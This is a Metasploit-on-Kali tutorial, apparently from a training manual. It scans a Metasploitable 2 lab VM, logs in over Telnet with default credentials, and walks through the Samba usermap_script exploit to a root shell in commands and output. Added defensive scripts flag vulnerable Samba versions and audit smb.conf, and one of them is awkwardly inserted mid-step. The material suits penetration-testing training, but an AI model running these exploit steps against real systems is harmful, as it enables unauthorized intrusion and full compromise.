Metasploit Tutorial for Kali Linux


Basic Setup

Kali 2.0 no longer ships a "metasploit" service, so starting it with service metasploit start does not work.
To start MSF with database support on Kali 2.0, proceed as follows:
1. Start the PostgreSQL database first:
/etc/init.d/postgresql start; or service postgresql start;
2. Initialize the MSF database (the key step!): msfdb init; (if initialization fails, try msfdb reinit! The databases created by default are named msf and msf_test; the user name is msf; the password is empty by default)
3. Run msfconsole: msfconsole;
4. Check the database connection status inside msf: db_status.
5. Update Metasploit: msfupdate (my update has not succeeded yet; it is probably a problem with the mirror!)
6. Make msf and postgresql start automatically at boot:
update-rc.d postgresql enable
update-rc.d metasploit enable
All right, now let's try it out and see how it is used!

Scanning in Metasploit

Metasploit ships with a large number of built-in scanners. They can be used to enumerate the services running on a single machine or on an entire network. This section describes scanning with Metasploit's auxiliary modules.
[Example 4-4] Scan a target host in Metasploit. The steps are as follows:
(1) Start the MSF console. Run:
root@kali:~# msfconsole
msf>
(2) Search for all available scanner modules. Run:
msf > search scanner

Matching Modules

Name Disclosure Date Rank Description
—- ——————– ———– ———————————————
auxiliary/admin/smb/check_dir_file normal SMB Scanner Check File/Directory Utility
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/gather/citrix_published_applications normal Citrix MetaFrame ICA Published Applications Scanner
auxiliary/gather/enum_dns normal DNS Record Scanner and Enumerator
auxiliary/gather/natpmp_external_address normal NAT-PMP External Address Scanner
auxiliary/gather/windows_deployment_services_shares normal Microsoft Windows Deployment Services Unattend Gatherer
auxiliary/pro/nexpose normal PRO: Nexpose Scanner Integration
auxiliary/pro/webscan normal PRO: Web Application Scanner
auxiliary/scanner/afp/afp_login normal Apple Filing Protocol Login Utility
auxiliary/scanner/afp/afp_server_info normal Apple Filing Protocol Info Enumerator
auxiliary/scanner/backdoor/energizer_duo_detect normal Energizer DUO Trojan Scanner
auxiliary/scanner/chargen/chargen_probe 1996-02-08 normal Chargen Probe Utility
The output lists every scanner module available in Metasploit, covering a wide range of services. To narrow the list, search only for modules that scan the SSH service.
(3) Search for SSH scanner modules. Run:
msf > search scanner/ssh

Matching Modules

Name Disclosure Date Rank Description
—- ————— ———– ——————————————-
auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal Cerberus FTP Server SFTP Username Enumeration
auxiliary/scanner/ssh/ssh_enumusers normal SSH Username Enumeration
auxiliary/scanner/ssh/ssh_identify_pubkeys normal SSH Public Key Acceptance Scanner
auxiliary/scanner/ssh/ssh_login normal SSH Login Check Scanner
auxiliary/scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner
auxiliary/scanner/ssh/ssh_version normal SSH Version Scanner
The output shows several SSH modules. Choose the appropriate one and run the scan.
(4) Scan the SSH service with the ssh_version module. Run:
msf > use auxiliary/scanner/ssh/ssh_version
(5) View the configurable options of the ssh_version module. Run:
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
———— ————— ——– —————————————————————————–
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
The output lists the module's configurable options. The RHOSTS option is not yet set.
(6) Set the RHOSTS option. Run:
msf auxiliary(ssh_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
The output shows that RHOSTS (the target host address) is now set to 192.168.6.105 (the Metasploitable 2 host).
(7) Start the scan. Run:
msf auxiliary(ssh_version) > exploit
[*] 192.168.6.105:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) >
The output shows that the target is running an SSH service, version SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.
[Example 4-5] Scan a MySQL server. The steps are as follows:
(1) Open the MSF console. Run:
root@kali:~# msfconsole
msf>
(2) Load the mysql_version module and view its configurable options. Run:
msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
THREADS 1 yes The number of concurrent threads
The output shows that RHOSTS is not set. Set RHOSTS to the target host's address.
(3) Set RHOSTS and run the MySQL scan. Run:
msf auxiliary(mysql_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
msf auxiliary(mysql_version) > exploit
[*] 192.168.6.105:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output shows that the MySQL version running on the target is 5.0.51a.
[Example 4-6] Scan the Telnet service. The steps are as follows:
(1) Start the MSF console. Run:
root@kali:~# msfconsole
msf>
(2) Load the telnet_version module and view its configurable options. Run:
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options
Module options (auxiliary/scanner/telnet/telnet_version):
Name Current Setting Required Description
—- ————— ————— ———————————————————————–
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
RPORT 23 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the Telnet probe
USERNAME no The username to authenticate as
The output shows four required options. Three of them are already set; only RHOSTS remains.
(3) Set RHOSTS and start the scan. Run:
msf auxiliary(telnet_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
msf auxiliary(telnet_version) > exploit
[*] 192.168.6.105:23 TELNET _ _ _ _ _ _ _ \x0a _ | | _ _ _ | | _ () | | |_ | | | \ \x0a| ‘_ _ \ / _ \ __/ _ / | ‘_ | |/ _ | | / ` | ‘ | |/ _ \ ) |\x0a| | | | | | / || (| _ \ |) | | () | | || (| | |) | | // / \x0a|| || ||__|____,|/ ./||__/||___,|./||_||\x0a |_| \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output above is just a block of text with no Telnet version information. It does, however, show the login hint "Login with msfadmin/msfadmin to get started", which reveals a user name and password for the target's Telnet service. We can now try to log in.
(4) Log in to the target's Telnet service. Run:
root@kali:~# telnet -l msfadmin 192.168.6.105
Trying 192.168.6.105…
Connected to 192.168.6.105.
Escape character is ‘^]’.
Password: # enter the password msfadmin
Last login: Tue Jul 8 06:32:46 EDT 2014 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$
Once the msfadmin@metasploitable: prompt appears, the Telnet login has succeeded and standard Linux commands can be run. For example, to view the groups the user belongs to, run:
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
The output shows information about the msfadmin user: gid indicates the user's primary group (the first group account in groups), and the other group accounts in groups are the user's supplementary groups.
Metasploit can also scan a range of addresses. The following uses Samba servers as the example and shows how to find the Samba servers running on a network. First, a scan of a single address.
[Example 4-7] Scan the Samba server on the host 192.168.6.105. The steps are as follows:
(1) Start the MSF console. Run:
root@kali:~# msfconsole
msf>
(2) Load the smb_version module and view its configurable options. Run:
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
—- ————— ———– ———————————————————————–
RHOSTS yes The target address range or CIDR identifier
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
(3) Set the RHOSTS option. Run:
msf auxiliary(smb_version) > set RHOSTS 192.168.6.105
RHOSTS => 192.168.6.105
(4) Start the scan. Run:
msf auxiliary(smb_version) > exploit
[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The output shows the running Samba server and its version.
Next, scan the whole 192.168.6.0/24 network for hosts running Samba. The steps are as follows:
(1) Select the smb_version module. Run:
msf > use auxiliary/scanner/smb/smb_version
(2) Set the module's options: the target range and the number of concurrent threads. Run:
msf auxiliary(smb_version) > set RHOSTS 192.168.6.0/24
RHOSTS => 192.168.6.0/24
msf auxiliary(smb_version) > set THREADS 255
THREADS => 255
(3) Start the scan. Run:
msf auxiliary(smb_version) > exploit
[*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:WIN-RKPKQFBLG6C) (domain:WORKGROUP)
[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] 192.168.6.104:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:LYW) (domain:LYW)
[*] 192.168.6.110:445 is running Windows XP Service Pack 0 / 1 (language: Chinese - Traditional) (name:AA-886OKJM26FSW) (domain:WORKGROUP)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
The output shows four hosts on the 192.168.6.0/24 network answering as SMB (Samba) servers, together with the operating system each one runs.
[Example 4-8] Exploit the Samba server. The steps are as follows:
(1) Start the MSF console. Run:
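The scans above print one line per host in a fixed format, which makes them easy to collect into an inventory. The following is an added example for this tutorial, not code from Metasploit or from the book: it parses constructed lines in the ssh_version, mysql_version and smb_version formats shown above and flags Samba versions that fall inside the range the usermap_script module description gives for CVE-2007-2447 (3.0.20 through 3.0.25rc3), so a defender can see which scanned hosts need patching. The sample lines and the 3.0.26a host are constructed; the version-ordering rule (a release candidate sorts before the final release) is an assumption of this example.

```python
"""Parse Metasploit scanner output into a service inventory and flag Samba
versions inside the range affected by CVE-2007-2447 (added example)."""
import re

# Constructed sample: lines in the formats printed by the ssh_version,
# mysql_version and smb_version modules, plus the usual progress lines.
SAMPLE_OUTPUT = """\
[*] 192.168.6.105:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] 192.168.6.105:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 192.168.6.105:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] 192.168.6.106:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:WIN-RKPKQFBLG6C) (domain:WORKGROUP)
[*] 192.168.6.107:445 is running Unix Samba 3.0.26a-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# Affected range as stated in the usermap_script module description.
AFFECTED_SAMBA = ("3.0.20", "3.0.25rc3")

# One regex per output format; the named groups become inventory fields.
PATTERNS = [
    ("ssh", re.compile(r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+), SSH server version: (?P<version>.+)$")),
    ("mysql", re.compile(r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) is running MySQL (?P<version>\S+)")),
    ("samba", re.compile(r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) is running Unix Samba (?P<version>\S+)")),
    ("windows-smb", re.compile(r"^\[\*\] (?P<host>[\d.]+):(?P<port>\d+) is running (?P<version>Windows .+?) \(language")),
]


def parse_scan_output(text):
    """Return a list of {host, port, service, version} records.
    Progress lines ("Scanned 1 of 1 hosts", ...) match no pattern and are skipped."""
    records = []
    for line in text.splitlines():
        for service, pattern in PATTERNS:
            m = pattern.match(line.strip())
            if m:
                records.append({"host": m["host"], "port": int(m["port"]),
                                "service": service, "version": m["version"].strip()})
                break
    return records


_SAMBA_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?([a-z])?")


def samba_version_key(version):
    """Sortable key for strings such as 3.0.20-Debian, 3.0.25rc3 or 3.0.26a.
    Assumed ordering: an rc sorts before the final release of the same number,
    and a letter suffix (3.0.26a) sorts after the plain release."""
    m = _SAMBA_VER.match(version)
    if not m:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    major, minor, patch, rc, letter = m.groups()
    is_final = 0 if rc else 1
    return (int(major), int(minor), int(patch), is_final, int(rc or 0),
            ord(letter) if letter else 0)


def in_affected_range(version, affected=AFFECTED_SAMBA):
    """True if the Samba version lies inside the inclusive affected range."""
    lo, hi = (samba_version_key(v) for v in affected)
    return lo <= samba_version_key(version) <= hi


def find_affected_samba(records):
    """Hosts whose Samba version falls inside the affected range."""
    return [r["host"] for r in records
            if r["service"] == "samba" and in_affected_range(r["version"])]


if __name__ == "__main__":
    inventory = parse_scan_output(SAMPLE_OUTPUT)
    for r in inventory:
        print(f"{r['host']}:{r['port']}  {r['service']:12} {r['version']}")
    print("Samba hosts in the CVE-2007-2447 range:", find_affected_samba(inventory))
```

Feed it the saved console output of a scan (or pipe msfconsole output through it) and the result is a host/service/version table plus the short list of Samba hosts that still need the upgrade; the 3.0.26a host is correctly left out.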
root@kali:~# msfconsole
msf>
(2) Search for the usermap module. Run:
msf > search samba/usermap

Matching Modules

Name Disclosure Date Rank Description
—- ————— ———– ———————————————–
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba “username map script” Command Execution
The output shows one usermap module.
(3) View the details of the usermap_script module. Run:
msf > info exploit/multi/samba/usermap_script
Name: Samba “username map script” Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck jduck@metasploit.com
Available targets:
Id Name
0 Automatic
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 139 yes The target port
Payload information:
Space: 1024
Description:
This module exploits a command execution vulerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
“username map script” configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!
References:
http://cvedetails.com/cve/2007-2447/
http://www.osvdb.org/34700
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html
The output shows the details of the usermap_script module. Only the RHOST option needs to be set. No payload has to be chosen: the module automatically provides a Linux command shell.
(4) Load the usermap_script module and set the RHOST option. Run:
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.6.105
RHOST => 192.168.6.105
(5) Launch the exploit. Run:
msf exploit(usermap_script) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo IwmN37I0D3cTGJhv;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “IwmN37I0D3cTGJhv\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.6.105:34848) at 2014-07-16 10:00:59 +0800
The output shows that a session was opened successfully, which means the target host has been compromised. Linux commands can now be run to inspect the target, for example:
whoami # show the user currently logged in
root
The output shows that the current user on the target system is root. For details about this user, use the id command:
id # show information about the current user
uid=0(root) gid=0(root)
The output shows that root belongs to the root group, with both UID and GID equal to 0.
This article is taken from the Kali Linux Penetration Testing Training Manual (daxueba internal material). Please credit the source when reposting; respect the craft and respect IT people!
There may be minor differences; corrections are welcome!
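The module description above explains the root cause: the non-default "username map script" option in smb.conf hands the client-supplied user name to a shell before authentication. The defensive counterpart is to audit Samba configurations for that option and either remove it or upgrade past the affected versions. The following is an added example for this tutorial, not code from Samba or Metasploit: it parses two constructed smb.conf files, the weak one with "username map script" set and a hardened one that uses the static "username map" file instead (a file that involves no shell), and reports the risky parameter. The script path /etc/samba/scripts/mapusers.sh and the users file /etc/samba/smbusers are constructed names; the assumption that Samba matches parameter names ignoring case and whitespace is built into the normalisation.

```python
"""Audit smb.conf for the 'username map script' option abused by the
usermap_script module, with the weak and hardened configs side by side
(added example)."""
import re

# Constructed weak configuration: 'username map script' is the option the
# module description names as the vulnerable, non-default setting.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   ; map client names through an external script before authentication
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[share]
   path = /srv/share
   read only = no
"""

# Constructed hardened configuration: the script option is gone. If name
# mapping is really needed, a static 'username map' file involves no shell.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server
   username map = /etc/samba/smbusers
   security = user

[share]
   path = /srv/share
   read only = no
"""

_SECTION = re.compile(r"^\[(?P<name>[^\]]+)\]\s*$")
# Parameter names normalised the way Samba compares them (assumed: case and
# whitespace are ignored), so 'Username Map Script' is caught as well.
RISKY_PARAMS = {"usernamemapscript"}


def _norm(name):
    return re.sub(r"\s+", "", name).lower()


def parse_smb_conf(text):
    """Return {section: {normalised_param: value}}.
    Comment lines (# or ;) and blank lines are skipped; 'include' directives
    are not followed, so audit included files separately."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = _SECTION.match(line)
        if m:
            current = m["name"].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" not in line or current is None:
            continue
        key, _, value = line.partition("=")
        sections[current][_norm(key)] = value.strip()
    return sections


def audit_smb_conf(text):
    """List (section, parameter, value) findings for risky parameters."""
    findings = []
    for section, params in parse_smb_conf(text).items():
        for key, value in params.items():
            if key in RISKY_PARAMS:
                findings.append((section, key, value))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, "->", audit_smb_conf(conf) or "no risky parameters")
```

Run it against the real /etc/samba/smb.conf of each host the smb_version scan reported as Samba 3.0.20 through 3.0.25rc3: a finding means the host is exposed to the unauthenticated command execution described above until the option is removed or Samba is upgraded; no finding means the vulnerable code path is not reachable with that configuration, although upgrading is still the durable fix.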

